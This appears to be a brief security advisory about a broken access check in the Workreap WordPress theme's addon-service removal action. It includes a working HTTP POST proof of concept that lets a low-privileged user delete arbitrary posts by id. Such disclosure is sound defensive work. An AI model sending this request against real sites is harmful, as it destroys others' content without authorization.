The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.
POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: [Subscriber+]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65
action=workreap_addons_service_remove&id=6191&security=295c6a26b2